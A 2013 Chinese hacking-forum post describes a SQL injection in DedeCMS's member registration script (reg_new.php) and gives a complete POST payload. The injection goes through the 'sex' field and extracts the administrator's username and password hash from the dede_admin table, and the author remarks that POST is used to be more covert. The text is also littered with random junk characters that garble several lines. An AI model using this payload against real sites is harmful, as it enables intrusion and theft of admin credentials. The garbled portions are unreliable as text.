找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2101|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞! M0 a8 s6 d4 J$ R" T# N/ w
简要描述:
( W/ K0 ?$ ?% P3 A 8 g9 Y: _1 {5 I; j& _; @5 ]( J  `
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. j0 T& F% N. }0 g7 f5 r
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
1 ^$ @& [) c/ `: u4 u详细说明:跟这个漏洞
/ K3 @6 _/ G" d6 V3 ^
8 i" E. h9 X; N% H% u& p) QWooYun: Dedecms SQL注射导致审核机制绕过漏洞6 r8 x4 S/ W: o8 O/ v$ Q: x( p
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.0 J7 `2 T, o; S# _0 y* {
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
4 d) Q4 W% C+ |- G5 i5 m! l+ e4 c
* n9 X8 }& ~+ ]2 x: R# ewww.political-security.com/member/reg_new.php
6 V: t) _/ `. b3 d, U2 \: D4 R
2 T2 [1 z4 f3 u2 G. V: t) X; Y& sPOST
2 ]- k8 _- R- a0 j3 L* @
/ \& q. }- w% U0 b& idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
/ f, V' P# P% a0 b6 vuserid=c4rp3nt3r&uname=c4rp3nt3r
% h* t) a. w% ^' q&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
( G9 i& M4 `: n2 W; {6 n&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,5 c* V' L( b4 `5 q" I) y! _* \; T# [
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
! K2 n, c9 G. J4 z* S6 e0 |%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表